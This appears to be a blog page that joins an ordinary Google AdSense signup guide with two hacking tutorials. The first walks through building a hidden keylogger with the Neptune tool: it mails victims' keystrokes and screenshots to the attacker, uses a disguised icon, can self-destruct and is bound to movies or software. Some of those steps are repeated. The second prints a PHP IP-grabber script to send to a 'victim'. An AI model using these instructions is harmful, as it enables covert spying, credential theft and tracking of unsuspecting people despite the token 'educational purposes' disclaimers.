Difficulty: Easy
Time Required: 10-15 minutes to open an account.
Additional time to research the options to monetize your blog.
Here's How:
Familiarize yourself with what you can and cannot
do as part of the Google AdSense program to ensure you're prepared to start
your new account.
Click on the 'Sign Up Now' button in the upper
righthand corner of your screen.
3. Complete the online application.
You will need to provide your blog's URL
and primary language as well as answer some questions related to the rules of
the Google AdSense program. You'll also need to provide your payment
information to receive the money you generate on your blog from Google.
4. Access your new account and review the ads available to you.
Google AdSense provides a wide variety of
advertising options to bloggers from text ads to image ads and more. Take some
time to research everything that's available to determine what will work best
for your blog.
5. Select your ad design choices.
Once you've decided which ad opportunities are
best for your blog, select them. Google will provide a snippet of HTML
code to you after you make your selection.
6. Insert your Google AdSense HTML code into your blog.
Copy and paste the HTML code provided by Google
into your blog's template. One of the easiest ways for a beginner blogger to do
this is by inserting a text widget into his or her blog's template and pasting
the code in the widget.
7. Let Google do the rest.
It may take a few hours or a few days for Google
to start serving ads on your blog. Google will search your blog to determine
the predominant subjects of each page. When readers visit your blog, the HTML
code you pasted into your blog from Google will activate and relevant ads will
be displayed based on each page's content.
8. Collect your money.
Remember, Google AdSense typically pays based on
click-throughs (the number of times people click on an ad). Therefore, Google
AdSense is unlikely to generate a large income for you, but every bit helps!
Tips:
- Read and
adhere to the Google AdSense policies in full before you sign up for
a Google AdSense account. If you violate any of the policies, your account
will be cancelled.
- Take
some time to perfect your Google AdSense program once you get started by
learning the steps you need to take to increase your Google AdSense earning
potential.
Keylogger Attack ? (hacking)
What Is Keyloggers?
Using key logger utility you will be able to establish full
control over your computer. You will also find out, what was going on your
computer in your absence: what was run and typed etc which act as best children
internet protection software. Using the keylogging program constantly, you can
restore the previously typed text in case you have lost it. Keystroke logger
software works in the hidden mode and invisible on Windows operating system
including Windows 7/VISTA/XP/Server 2008/NT/98 etc.
Lets start the guide: How to
use it. ?
1) first you need to download this application, you can download it from its website Download, but currently its under maintenance..
Download here - Click Here To Download
2) I am giving tut about Neptune 1.4 only, but you can use 1.45 also, it is a updated version that sends screenshot also.
After downloading, Extract the .rar file, open the project's folder, click on project Neptune v1.4, Now it will show a window like shown below, Do whatever mentioned in screen shot.
Note: i am giving tut for getting logs by mail(gmail here), but you can use other also, or can use ftp server also.
3) Now go to 'Server Creation' tab
and press 'Generate new server' under 'server creation', and give name of your
keylogger and thats it.. you are done :)
4) Make it self destructive :In tab Extra options, you can check 'self destruct on ', if you want that it should be remove after any particular date.
5) Add Icon: You can also add any icon to the final keylogger file, for that go to 'Server Creation' tab and select 'Use file icon' under 'server settings' and select any icon file.
6) Binding: You can bind it with any other file also, for that press the file binder button, a window will open(as shown in screen shot)then right click and select 'add file' and then select anything for ex. any software, movie, video, song etc. with which you wanna bind it. 5.1) After selecting the binding file, dont close this window, and go to step 3.
4) Make it self destructive :In tab Extra options, you can check 'self destruct on ', if you want that it should be remove after any particular date.
5) Add Icon: You can also add any icon to the final keylogger file, for that go to 'Server Creation' tab and select 'Use file icon' under 'server settings' and select any icon file.
6) Binding: You can bind it with any other file also, for that press the file binder button, a window will open(as shown in screen shot)then right click and select 'add file' and then select anything for ex. any software, movie, video, song etc. with which you wanna bind it. 5.1) After selecting the binding file, dont close this window, and go to step 3.
7) Sreenshots: (only available in naptune 1.45) Go to Extra options, check 'send screen shots' under 'Screenshots'
Note:
This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any misuse
that you do. Hacking email accounts is criminal activity and is punishable
under cyber crime and you may get upto 40 years of imprisonment, if got caught
in doing so.
How To Grab Someone IP Address ?
I will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.
Copy the below codes into Notepad and save it as Grab.php (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>
Now make Free account on any of the free web hosting sites Ripway or on My3gb .
Now upload Grab.php to your web hosting site.
Copy the link of your uploaded file and send it to victim.
As soon as victim will click on your link his ip will be saved in your free web hosting site.
Enjoy you are Done !!
Note:
This tutorial is only for Educational Purposes, I did not take any
responsibility of any misuse, you will be solely responsible for any misuse
that you do. Hacking email accounts is criminal activity and is punishable
under cyber crime and you may get upto 40 years of imprisonment, if got caught
in doing so.
Subscribe to:
Posts (Atom)